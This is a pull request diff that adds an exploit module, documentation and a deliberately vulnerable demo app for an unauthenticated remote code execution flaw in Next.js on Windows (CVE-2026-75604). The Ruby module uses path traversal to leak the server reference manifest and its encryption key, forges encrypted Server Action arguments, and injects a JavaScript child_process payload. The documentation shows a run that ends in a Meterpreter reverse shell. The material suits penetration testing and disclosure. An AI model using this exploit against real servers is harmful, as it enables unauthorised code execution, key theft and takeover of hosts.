### PR TITLE
Add Next.JS Unauthenticated RCE on Windows Servers (CVE-2026-75604)

### DIFF
--- a/data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js
+++ b/data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js
@@ -1,0 +1,28 @@
+export const revalidate = 3600
+
+export function generateStaticParams() {
+  return [{ rest: ['seed'] }]
+}
+
+export default async function AppCachePage({ params }) {
+  const { rest } = await params
+  const captured = `ordinary-bound-value:${rest.join('/')}`
+
+  // A closure-bound "use server" action. Its presence makes `next build` emit
+  // server-reference-manifest.json (with an encryptionKey), which is the private
+  // file the traversal later discloses.
+  async function harmlessBoundAction(formData) {
+    'use server'
+    return `${captured}:${formData.get('value')}`
+  }
+
+  return (
+    <main>
+      <p id="app-rest">{rest.join('/')}</p>
+      <form action={harmlessBoundAction}>
+        <input name="value" defaultValue="harmless" />
+        <button type="submit">submit</button>
+      </form>
+    </main>
+  )
+}

--- a/data/exploits/CVE-2026-75604/app/layout.js
+++ b/data/exploits/CVE-2026-75604/app/layout.js
@@ -1,0 +1,11 @@
+export const metadata = {
+  title: 'incremental-cache path traversal repro',
+}
+
+export default function RootLayout({ children }) {
+  return (
+    <html lang="en">
+      <body>{children}</body>
+    </html>
+  )
+}

--- a/data/exploits/CVE-2026-75604/app/page.js
+++ b/data/exploits/CVE-2026-75604/app/page.js
@@ -8,15 +8,42 @@ export default function HomePage() {
 
   async function runMessageFactory(formData) {
     'use server'
-    const createMessage = await messageFactory(formData.get('value'))
+
+    const firstName = formData.get('firstName')
+    const lastName = formData.get('lastName')
+    const email = formData.get('email')
+    const bio = formData.get('bio')
+
+    const createMessage = await messageFactory(lastName)
     return createMessage()
   }
 
   return (
-    <main>
-      <form action={runMessageFactory}>
-        <input name="value" />
-        <button type="submit">Submit</button>
+    <main style={{ padding: '2rem', fontFamily: 'sans-serif' }}>
+      <h1>Server Actions Form</h1>
+      <form action={runMessageFactory} style={{ display: 'flex', flexDirection: 'column', gap: '1rem', maxWidth: '400px' }}>
+        
+        <div>
+          <label>First Name: </label><br />
+          <input name="firstName" defaultValue="John" style={{ width: '100%' }} />
+        </div>
+
+        <div>
+          <label>Last Name: </label><br />
+          <input name="lastName" defaultValue="Doe" style={{ width: '100%' }} />
+        </div>
+
+        <div>
+          <label>Email: </label><br />
+          <input name="email" defaultValue="test@test.com" style={{ width: '100%' }} />
+        </div>
+
+        <div>
+          <label>Bio: </label><br />
+          <textarea name="bio" defaultValue="Developer" style={{ width: '100%' }} />
+        </div>
+
+        <button type="submit" style={{ padding: '0.5rem', cursor: 'pointer' }}>Submit</button>
       </form>
     </main>
   )

--- a/data/exploits/CVE-2026-75604/app/page.js
+++ b/data/exploits/CVE-2026-75604/app/page.js
@@ -40,7 +40,7 @@ export default function HomePage() {
 
         <div>
           <label>Bio: </label><br />
-          <textarea name="bio" defaultValue="Developer" style={{ width: '100%' }} />
+          <textarea name="bio" defaultValue="" style={{ width: '100%' }} />
         </div>
 
         <button type="submit" style={{ padding: '0.5rem', cursor: 'pointer' }}>Submit</button>

--- a/data/exploits/CVE-2026-75604/app/page.js
+++ b/data/exploits/CVE-2026-75604/app/page.js
@@ -1,0 +1,23 @@
+async function createSafeMessage(value) {
+  'use server'
+  return () => `safe:${value}`
+}
+
+export default function HomePage() {
+  const messageFactory = createSafeMessage
+
+  async function runMessageFactory(formData) {
+    'use server'
+    const createMessage = await messageFactory(formData.get('value'))
+    return createMessage()
+  }
+
+  return (
+    <main>
+      <form action={runMessageFactory}>
+        <input name="value" />
+        <button type="submit">Submit</button>
+      </form>
+    </main>
+  )
+}

--- a/data/exploits/CVE-2026-75604/next.config.js
+++ b/data/exploits/CVE-2026-75604/next.config.js
@@ -1,0 +1,2 @@
+/** @type {import('next').NextConfig} */
+module.exports = {}

--- a/data/exploits/CVE-2026-75604/package.json
+++ b/data/exploits/CVE-2026-75604/package.json
@@ -1,0 +1,15 @@
+{
+  "name": "CVE-2026-75604",
+  "version": "1.0.0",
+  "private": true,
+  "scripts": {
+    "build": "next build",
+    "start": "next start -H 0.0.0.0 -p 4330",
+    "prod": "npm run build && npm run start"
+  },
+  "dependencies": {
+    "next": "16.2.11",
+    "react": "19.2.3",
+    "react-dom": "19.2.3"
+  }
+}

--- a/data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js
+++ b/data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js
@@ -1,0 +1,19 @@
+export async function getStaticPaths() {
+  return {
+    paths: [],
+    fallback: 'blocking',
+  }
+}
+
+export async function getStaticProps({ params }) {
+  return {
+    props: {
+      rest: params?.rest ?? [],
+    },
+    revalidate: 3600,
+  }
+}
+
+export default function PagesCachePage({ rest }) {
+  return <main id="pages-rest">{rest.join('/')}</main>
+}

--- a/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
+++ b/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
@@ -1,0 +1,83 @@
+## Vulnerable Application
+
+This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications
+hosted on Windows servers. Specifically crafted requests can execute arbitrary code on the target server.
+
+The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3,
+utilizing both Pages and App Routers without Cache Components.
+
+## Requirements
+
+- Node.js running on Windows
+- Pages Router and App Router without Cache Components
+- Default filesystem cache with a dynamic Pages ISR route and a dynamic cached App route
+- A closure-bound Server Action that captures the payload
+
+## Testing
+
+1. Go to https://github.com/coreybutler/nvm-windows, download the latest release, and install NVM.
+
+2. Install Node.js
+```
+nvm install 22
+nvm use 22
+```
+
+4. Open `data/exploits/CVE-2026-75604/` and install dependencies
+```
+npm install
+```
+
+5. Run the app
+```
+npm run prod
+```
+
+> **Note:** The module obtains a session only once, with a long timeout. You need to restart the server (using the command from step 5) or change the `revalidate` parameter value from `3600` to `5` (for example) in `data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js` and `data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js`
+
+## Scenario
+
+```
+msf > use windows/http/nextjs_unauth_rce_cve_2026_75604
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set RHOSTS 192.168.19.159
+RHOSTS => 192.168.19.159
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set RPORT 4330
+RPORT => 4330
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set LHOST eth0
+LHOST => eth0
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set APP_ROUTER app-cache
+APP_ROUTER => app-cache
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set PAGES_ROUTER pages-cache
+PAGES_ROUTER => pages-cache
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set ACTION_PATH /
+ACTION_PATH => /
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set TARGET_FIELD lastName
+TARGET_FIELD => lastName
+msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > run
+[*] Started reverse TCP handler on 192.168.19.153:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Vulnerable build ID found: SrDqDY9OAcd--11UfI9tg and encryption key successfully leaked
+[*] Fetching application Build ID...
+[+] Successfully retrieved Build ID: SrDqDY9OAcd--11UfI9tg
+[*] Leaking server reference manifest...
+[+] Successfully leaked manifest and encryption key: Skgyj8vJ40OnrEYjfucype/UcKO2kCUKdrdWeohOfNI=
+[*] Searching for available Server Actions at path: /...
+[+] Selected Action ID: 60f9167e4efdad52860eb04c97c53551bad5e489e8 (Ref: 1)
+[*] Encrypting bound arguments payload...
+[*] Sending exploit request to target server...
+[*] Request sent, awaiting payload execution...
+[*] Sending stage (232006 bytes) to 192.168.19.159
+[*] Meterpreter session 1 opened (192.168.19.153:4444 -> 192.168.19.159:50280) at 2026-08-26 18:54:18 -0400
+
+meterpreter > sysinfo
+Computer        : DESKTOP-GLLA9J3
+OS              : Windows 10 21H2 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-GLLA9J3\vognik
+```

--- a/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
+++ b/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
@@ -1,4 +1,4 @@
-## Vulnerable Application
+## Introduction
 
 This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications
 hosted on Windows servers. Specifically crafted requests can execute arbitrary code on the target server.
@@ -6,14 +6,14 @@ hosted on Windows servers. Specifically crafted requests can execute arbitrary c
 The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3,
 utilizing both Pages and App Routers without Cache Components.
 
-## Requirements
+### Requirements
 
 - Node.js running on Windows
 - Pages Router and App Router without Cache Components
 - Default filesystem cache with a dynamic Pages ISR route and a dynamic cached App route
 - A closure-bound Server Action that captures the payload
 
-## Testing
+### Setting up testing
 
 1. Go to https://github.com/coreybutler/nvm-windows, download the latest release, and install NVM.
 
@@ -23,19 +23,37 @@ nvm install 22
 nvm use 22
 ```
 
-4. Open `data/exploits/CVE-2026-75604/` and install dependencies
+3. Open `data/exploits/CVE-2026-75604/` and install dependencies
 ```
 npm install
 ```
 
-5. Run the app
+4. Run the app
 ```
 npm run prod
 ```
 
 > **Note:** The module obtains a session only once, with a long timeout. You need to restart the server (using the command from step 5) or change the `revalidate` parameter value from `3600` to `5` (for example) in `data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js` and `data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js`
 
-## Scenario
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Load the exploit module:
+   `use windows/http/nextjs_unauth_rce_cve_2026_75604`
+3. Set the target remote host (`RHOSTS`) and port (`RPORT`):
+   `set RHOSTS <target_ip>`
+   `set RPORT <target_port>`
+4. Set the required application route options:
+   `set APP_ROUTER app-cache`
+   `set PAGES_ROUTER pages-cache`
+   `set ACTION_PATH /`
+   `set TARGET_FIELD lastName`
+5. Configure your local listener IP (`LHOST`):
+   `set LHOST <your_ip>`
+6. Run the exploit:
+   `run`
+
+## Scenarios
 
 ```
 msf > use windows/http/nextjs_unauth_rce_cve_2026_75604

--- a/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
+++ b/documentation/modules/exploit/windows/http/nextjs_unauth_rce_cve_2026_75604.md
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications
 hosted on Windows servers. Specifically crafted requests can execute arbitrary code on the target server.
@@ -33,7 +33,10 @@ npm install
 npm run prod
 ```
 
-> **Note:** The module obtains a session only once, with a long timeout. You need to restart the server (using the command from step 5) or change the `revalidate` parameter value from `3600` to `5` (for example) in `data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js` and `data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js`
+> **Note:** The module obtains a session only once, with a long timeout. You need to restart
+> the server (using the command from step 4) or change the `revalidate` parameter value from
+> `3600` to `5` (for example) in `data/exploits/CVE-2026-75604/pages/pages-cache/[...rest].js`
+> and `data/exploits/CVE-2026-75604/app/app-cache/[...rest]/page.js`
 
 ## Verification Steps
 
@@ -52,6 +55,28 @@ npm run prod
    `set LHOST <your_ip>`
 6. Run the exploit:
    `run`
+
+## Options
+
+### APP_ROUTER
+Path to the page using App Router
+
+### PAGES_ROUTER
+Path to the page using Pages Router
+
+### PATH_SEGMENT
+Any dynamic path segment for App and Pages routers
+
+### TARGET_FIELD
+The specific form field name to inject the payload into, must match the last
+variable used in the closure (unset = defaults to the last field)
+
+### ACTION_PATH
+Path to the page containing the Server Action form (default: `/`)
+
+> **Note:** Do not include the route's dynamic path segment
+> within `APP_ROUTER` or `PAGES_ROUTER`, as those segments are
+> handled separately by the `PATH_SEGMENT` option
 
 ## Scenarios
 
@@ -84,7 +109,7 @@ msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > run
 [+] Selected Action ID: 60f9167e4efdad52860eb04c97c53551bad5e489e8 (Ref: 1)
 [*] Encrypting bound arguments payload...
 [*] Sending exploit request to target server...
-[*] Request sent, awaiting payload execution...
+[+] Received HTTP 200 OK response, awaiting payload execution...
 [*] Sending stage (232006 bytes) to 192.168.19.159
 [*] Meterpreter session 1 opened (192.168.19.153:4444 -> 192.168.19.159:50280) at 2026-08-26 18:54:18 -0400
 

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -47,6 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
+
+          # Session reliability depends on the page cache expiration time
           'Reliability' => [UNRELIABLE_SESSION]
         }
       )
@@ -57,8 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'Path to the Next.JS App', '/']),
         OptString.new('APP_ROUTER', [true, 'Path to the page using App Router']),
         OptString.new('PAGES_ROUTER', [true, 'Path to the page using Pages Router']),
-        OptString.new('PATH_SEGMENT', [true, 'Dynamic path segment for App and Pages routers']),
-        OptString.new('TARGET_FIELD', [true, 'The specific form field name to inject the payload into (must match the variable used in the closure, e.g. lastName)']),
+        OptString.new('PATH_SEGMENT', [false, 'Any dynamic path segment for App and Pages routers']),
+        OptString.new('TARGET_FIELD', [false, 'The specific form field name to inject the payload into (must match the variable used in the closure, e.g. lastName)']),
         OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form'])
       ]
     )
@@ -67,27 +69,55 @@ class MetasploitModule < Msf::Exploit::Remote
   def parse_build_id
     return @cached_build_id if @cached_build_id
 
+    path_segment = datastore['PATH_SEGMENT'].presence || Faker::Lorem.word
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, datastore['PAGES_ROUTER'], datastore['PATH_SEGMENT']),
+      'uri' => normalize_uri(target_uri.path, datastore['APP_ROUTER'], path_segment),
       'headers' => { 'Origin' => origin_header }
     )
-    fail_with(Failure::Unreachable, 'Failed to fetch the pages using Pages Router') unless res
+    return nil unless res&.code == 200
 
-    html = res.get_html_document
-    script = html.at('script[@id="__NEXT_DATA__"]')
-    fail_with(Msf::Module::Failure::UnexpectedReply, '__NEXT_DATA__ script tag not found') unless script
+    doc = res.get_html_document
+    return nil unless doc
 
-    json_data = JSON.parse(script.text)
-    @cached_build_id = json_data['buildId'] || fail_with(Msf::Module::Failure::UnexpectedReply, 'Build ID missing in configuration')
-  rescue JSON::ParserError
-    fail_with(Failure::BadConfig, 'Failed to parse JSON from __NEXT_DATA__')
+    doc.css('script').each do |script|
+      # Matches Next.js internal method calls like __next_f.push(...)
+      # and captures the argument inside the parentheses (the state chunk contents)
+      script.text.scan(/__next_f\.push\((.+)\)/).each do |match|
+        json_arr = begin
+          JSON.parse(match[0])
+        rescue StandardError
+          next
+        end
+
+        # Strips the chunk ID prefix at the beginning of the string (e.g., "1:{"key":"value"}" -> "{"key":"value"}")
+        state = begin
+          JSON.parse(json_arr[1].to_s.sub(/^\d+:/, ''))
+        rescue StandardError
+          next
+        end
+
+        if state.is_a?(Hash) && state.key?('b')
+          @cached_build_id = state['b']
+          return @cached_build_id
+        end
+      end
+    end
+
+    nil
   end
 
   def make_traversal(*parts, sequence: '..%5C')
     path = normalize_uri(*parts)
+
+    # Strips the Next.js routing data prefix (/_next/data/[build_id])
+    # to keep only internal directories for path traversal construction
     route_dirs = path.sub(%r{^/_next/data/[^/]+}, '').split('/')[1..-2] || []
+
     depth = [route_dirs.size + 1, 1].max
+
+    # Locates the final path segment (file name or terminal directory)
+    # and replaces it with the path traversal sequence
     path.sub(%r{/([^/]+)$}, "/#{(sequence * depth)}\\1")
   end
 
@@ -105,15 +135,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_ROUTER'], 'server-reference-manifest.json'),
       'headers' => { 'Origin' => origin_header }
     )
+    return nil unless res&.code == 200
 
-    fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to leak server reference manifest') unless res && res.code == 200
-
-    json_doc = res.get_json_document
-    if json_doc.is_a?(Hash) && json_doc.dig('pageProps', datastore['PATH_SEGMENT'])
-      fail_with(Msf::Module::Failure::UnexpectedReply, 'Target cache returned dynamic route fallback instead of manifest.')
+    json_doc = begin
+      res.get_json_document
+    rescue StandardError
+      nil
     end
+    return nil unless json_doc.is_a?(Hash) && (json_doc.key?('encryptionKey') || json_doc.key?('node'))
 
-    @cached_manifest = json_doc || fail_with(Msf::Module::Failure::UnexpectedReply, 'Manifest body is empty or invalid')
+    @cached_manifest = json_doc
   end
 
   def parse_actions(action_path)
@@ -122,41 +153,64 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, action_path),
       'headers' => { 'Origin' => origin_header }
     )
-    fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res
+    fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res&.code == 200
 
     actions = []
     res.get_html_document.css('form').each do |form|
-      inputs = form.css('input, textarea, select').map { |i| [i['name'], i['type'] || 'text'] }.to_h
-
-      valid_fields = inputs.reject do |name, type|
-        name.nil? || name.empty? || name.start_with?('$ACTION_') || %w[submit button image file].include?(type.downcase)
-      end
-
-      target_field = valid_fields.keys.first
-      next unless target_field
-
-      form.css('input[name]').each do |input|
-        ref_key = input['name']
-        next unless ref_key && ref_key.start_with?('$ACTION_REF_')
-
-        ref = ref_key.sub('$ACTION_REF_', '')
-        desc_node = form.at("input[@name='$ACTION_#{ref}:0']")
-        desc = desc_node ? desc_node['value'] : nil
-        next unless desc
-
-        action_id = begin
-          JSON.parse(desc)['id']
-        rescue StandardError
-          nil
-        end
-        next unless action_id
-
-        actions << { reference: ref, id: action_id, field: target_field, valid_fields: valid_fields }
-      end
+      actions.concat(extract_actions_from_form(form))
     end
 
-    fail_with(Msf::Module::Failure::UnexpectedReply, 'No compatible Server Actions found on the specified path') if actions.empty?
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'No compatible Server Actions found on the specified path') unless actions.any?
+
     actions
+  end
+
+  def extract_form_valid_fields(form)
+    inputs = {}
+
+    form.css('input, textarea, select').each do |i|
+      name = i['name']
+      next if name.nil? || name.empty?
+      next if name.start_with?('$ACTION_')
+
+      type = (i['type'] || 'text').downcase
+      next if %w[submit button image file].include?(type)
+
+      default_val = i.name == 'textarea' ? i.text.presence : i['value']
+
+      inputs[name] = default_val.presence || Rex::Text.rand_text_alphanumeric(6..12)
+    end
+
+    inputs
+  end
+
+  def extract_actions_from_form(form)
+    valid_fields = extract_form_valid_fields(form)
+    return [] if valid_fields.empty?
+
+    target_field = form.css('input[type="text"], textarea').map { |i| i['name'] }.find { |n| valid_fields.key?(n) } || valid_fields.keys.first
+
+    form_actions = []
+    form.css('input[name]').each do |input|
+      ref_key = input['name']
+      next unless ref_key&.start_with?('$ACTION_REF_')
+
+      ref = ref_key.sub('$ACTION_REF_', '')
+      desc_node = form.at("input[@name='$ACTION_#{ref}:0']")
+      desc = desc_node ? desc_node['value'] : nil
+      next unless desc
+
+      action_id = begin
+        JSON.parse(desc)['id']
+      rescue StandardError
+        nil
+      end
+      next unless action_id
+
+      form_actions << { reference: ref, id: action_id, field: target_field, valid_fields: valid_fields }
+    end
+
+    form_actions
   end
 
   def encrypt_bound_args(action_id, encryption_key)
@@ -187,9 +241,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to retrieve build ID. Target may not be running Next.js') unless build_id
 
     manifest = leak_manifest(build_id)
-    return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest && manifest['encryptionKey']
+    return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest&.key?('encryptionKey')
 
     Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked")
+  rescue StandardError => e
+    vprint_error("Check failed with exception: #{e.message}")
+    Exploit::CheckCode::Unknown('An error occurred while checking the target.')
   end
 
   def build_post_data(reference, action_id, encrypted_args, valid_fields)
@@ -203,16 +260,11 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => "$ACTION_#{reference}:2", 'data' => JSON.dump(encrypted_args) }
     ]
 
-    target_field = datastore['TARGET_FIELD'] if datastore['TARGET_FIELD'].present?
+    target_field = datastore['TARGET_FIELD']
+    payload_field_name = (target_field.present? && valid_fields.key?(target_field)) ? target_field : valid_fields.keys.first
 
-    payload_field_name = if target_field && valid_fields.key?(target_field)
-                           target_field
-                         else
-                           valid_fields.keys.last
-                         end
-
-    valid_fields.each_key do |field_name|
-      data_value = (field_name == payload_field_name) ? js_payload : Rex::Text.rand_text_alphanumeric(6..12)
+    valid_fields.each do |field_name, default_value|
+      data_value = (field_name == payload_field_name) ? js_payload : default_value
       post_data << { 'name' => field_name, 'data' => data_value }
     end
 
@@ -228,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status('Sending exploit request to target server...')
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, datastore['ACTION_PATH']),
       'headers' => { 'Origin' => origin_header },
@@ -236,16 +288,23 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s,
       'vars_get' => {}
     )
+
+    fail_with(Failure::Unreachable, "#{peer} - Failed to receive valid response from target server") unless res&.code == 200
+
+    res
   end
 
   def exploit
     print_status('Fetching application Build ID...')
     build_id = parse_build_id
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not extract build ID from response') unless build_id
     print_good("Successfully retrieved Build ID: #{build_id}")
 
     print_status('Leaking server reference manifest...')
     manifest = leak_manifest(build_id)
-    fail_with(Msf::Module::Failure::UnexpectedReply, 'Encryption key missing in manifest') unless manifest['encryptionKey']
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to leak server reference manifest') unless manifest
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Encryption key missing in manifest') unless manifest&.key?('encryptionKey')
+    print_good("Successfully leaked manifest and encryption key: #{manifest['encryptionKey']}")
 
     print_status("Searching for available Server Actions at path: #{datastore['ACTION_PATH']}...")
     actions = parse_actions(datastore['ACTION_PATH'])

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the Next.JS App', '/']),
-        OptString.new('CACHE_PATH', [true, 'Cache directory name used by the app', 'app-cache']),
+        OptString.new('APP_CACHE_PATH', [true, 'Cache directory name used by the app', 'app-cache']),
+        OptString.new('PAGES_CACHE_PATH', [true, 'Pages cache directory name used by the app', 'pages-cache']),
         OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form', '/'])
       ]
     )
@@ -66,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, datastore['CACHE_PATH'], 'seed'),
+      'uri' => normalize_uri(target_uri.path, datastore['PAGES_CACHE_PATH'], 'seed'),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'GET',
-      'uri' => make_traversal(target_uri.path, 'app-cache', 'server-reference-manifest'),
+      'uri' => make_traversal(target_uri.path, datastore['APP_CACHE_PATH'], 'server-reference-manifest'),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }
@@ -103,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['CACHE_PATH'], 'server-reference-manifest.json'),
+      'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_CACHE_PATH'], 'server-reference-manifest.json'),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -58,7 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APP_ROUTER', [true, 'Path to the page using App Router']),
         OptString.new('PAGES_ROUTER', [true, 'Path to the page using Pages Router']),
         OptString.new('PATH_SEGMENT', [true, 'Dynamic path segment for App and Pages routers']),
-        OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form', '/'])
+        OptString.new('TARGET_FIELD', [true, 'The specific form field name to inject the payload into (must match the variable used in the closure, e.g. lastName)']),
+        OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form'])
       ]
     )
   end
@@ -75,10 +76,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = res.get_html_document
     script = html.at('script[@id="__NEXT_DATA__"]')
-    fail_with(Failure::NotVulnerable, '__NEXT_DATA__ script tag not found') unless script
+    fail_with(Msf::Module::Failure::UnexpectedReply, '__NEXT_DATA__ script tag not found') unless script
 
     json_data = JSON.parse(script.text)
-    @cached_build_id = json_data['buildId'] || fail_with(Failure::NotVulnerable, 'Build ID missing in configuration')
+    @cached_build_id = json_data['buildId'] || fail_with(Msf::Module::Failure::UnexpectedReply, 'Build ID missing in configuration')
   rescue JSON::ParserError
     fail_with(Failure::BadConfig, 'Failed to parse JSON from __NEXT_DATA__')
   end
@@ -105,14 +106,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'Origin' => origin_header }
     )
 
-    fail_with(Failure::NotVulnerable, 'Failed to leak server reference manifest') unless res && res.code == 200
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to leak server reference manifest') unless res && res.code == 200
 
     json_doc = res.get_json_document
     if json_doc.is_a?(Hash) && json_doc.dig('pageProps', datastore['PATH_SEGMENT'])
-      fail_with(Failure::NotVulnerable, 'Target cache returned dynamic route fallback instead of manifest.')
+      fail_with(Msf::Module::Failure::UnexpectedReply, 'Target cache returned dynamic route fallback instead of manifest.')
     end
 
-    @cached_manifest = json_doc || fail_with(Failure::NotVulnerable, 'Manifest body is empty or invalid')
+    @cached_manifest = json_doc || fail_with(Msf::Module::Failure::UnexpectedReply, 'Manifest body is empty or invalid')
   end
 
   def parse_actions(action_path)
@@ -154,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    fail_with(Failure::NotVulnerable, 'No compatible Server Actions found on the specified path') if actions.empty?
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'No compatible Server Actions found on the specified path') if actions.empty?
     actions
   end
 
@@ -182,46 +183,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    build_id = begin
-      parse_build_id
-    rescue StandardError
-      nil
-    end
+    build_id = parse_build_id
     return Exploit::CheckCode::Unknown('Failed to retrieve build ID. Target may not be running Next.js') unless build_id
 
-    manifest = begin
-      leak_manifest(build_id)
-    rescue StandardError
-      nil
-    end
+    manifest = leak_manifest(build_id)
     return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest && manifest['encryptionKey']
 
     Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked")
   end
 
-  def exploit
-    print_status('Fetching application Build ID...')
-    build_id = parse_build_id
-    print_good("Successfully retrieved Build ID: #{build_id}")
-
-    print_status('Leaking server reference manifest...')
-    manifest = leak_manifest(build_id)
-    fail_with(Failure::NotVulnerable, 'Encryption key missing in manifest') unless manifest['encryptionKey']
-
-    print_status("Searching for available Server Actions at path: #{datastore['ACTION_PATH']}...")
-    actions = parse_actions(datastore['ACTION_PATH'])
-
-    selected_action = actions.find { |act| manifest.dig('node', act[:id]) }
-    fail_with(Failure::NotVulnerable, 'Target vulnerable Server Action node not found in manifest') unless selected_action
-
-    reference = selected_action[:reference]
-    action_id = selected_action[:id]
-    valid_fields = selected_action[:valid_fields]
-    print_good("Selected Action ID: #{action_id} (Ref: #{reference})")
-
-    print_status('Encrypting bound arguments payload...')
-    encrypted_args = encrypt_bound_args(action_id, manifest['encryptionKey'])
-
+  def build_post_data(reference, action_id, encrypted_args, valid_fields)
     js_bytes = "String.fromCharCode(#{payload.encoded.bytes.join(',')})"
     js_payload = "return process.mainModule.require('child_process').exec(#{js_bytes})"
 
@@ -232,11 +203,24 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => "$ACTION_#{reference}:2", 'data' => JSON.dump(encrypted_args) }
     ]
 
-    last_field_name = valid_fields.keys.last
+    target_field = datastore['TARGET_FIELD'] if datastore['TARGET_FIELD'].present?
+
+    payload_field_name = if target_field && valid_fields.key?(target_field)
+                           target_field
+                         else
+                           valid_fields.keys.last
+                         end
+
     valid_fields.each_key do |field_name|
-      data_value = (field_name == last_field_name) ? js_payload : Rex::Text.rand_text_alphanumeric(6..12)
+      data_value = (field_name == payload_field_name) ? js_payload : Rex::Text.rand_text_alphanumeric(6..12)
       post_data << { 'name' => field_name, 'data' => data_value }
     end
+
+    post_data
+  end
+
